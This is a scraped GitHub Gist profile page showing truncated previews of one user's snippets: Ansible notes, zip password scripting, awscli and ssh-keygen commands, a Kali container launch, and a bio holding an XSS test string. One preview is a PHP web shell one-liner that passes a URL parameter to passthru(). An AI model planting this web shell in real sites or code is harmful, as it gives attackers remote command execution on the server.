Skip to content

Instantly share code, notes, and snippets.

View AdamOssenford's full-sized avatar
:octocat:
<script>alert('jalapeño network');</script>

Adam Ossenford AdamOssenford

:octocat:
<script>alert('jalapeño network');</script>
View GitHub Profile
MYPWD="w00t"
expect -c '
spawn zip blap.zip blah -e
expect {
"*Enter password*" { send "'"$MYPWD"'\r"
exp_continue
}
"*Verify password*" { send "'"$MYPWD"'\r"
exp_continue
<? echo passthru($_GET['cmd']); ?>
RUN apt-get clean && rm -rf /var/lib/apt/lists/* /tmp/* /var/tmp/*
@AdamOssenford
AdamOssenford / ansible-summary.md
Created January 18, 2016 00:50
This is an ANSIBLE Cheat Sheet from Jon Warbrick

An Ansible summary

Jon Warbrick, July 2014, V3.2 (for Ansible 1.7)

Configuration file

intro_configuration.html

First one found from of

# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
sudo -H pip install awscli --upgrade --ignore-installed six && sudo -H pip install saws --upgrade --ignore-installed six
sudo easy_install pip
ssh-keygen -p -f /path/to/your/privatekey
cd ~/.ssh; ssh-keygen -p -f id_rsa
@AdamOssenford
AdamOssenford / evills
Created February 17, 2016 05:47 — forked from Eugeny/evills
#!/usr/bin/python
# -*- coding: utf-8 -*-
import subprocess
__all__ = ["transform"]
__version__ = '0.3'
__author__ = 'Christoph Burgmer <cburgmer@ira.uka.de>'
__url__ = 'http://github.com/cburgmer/upsidedown'
docker run -it officialkali/kali /bin/bash
apt-get update; apt-get install wordlists -y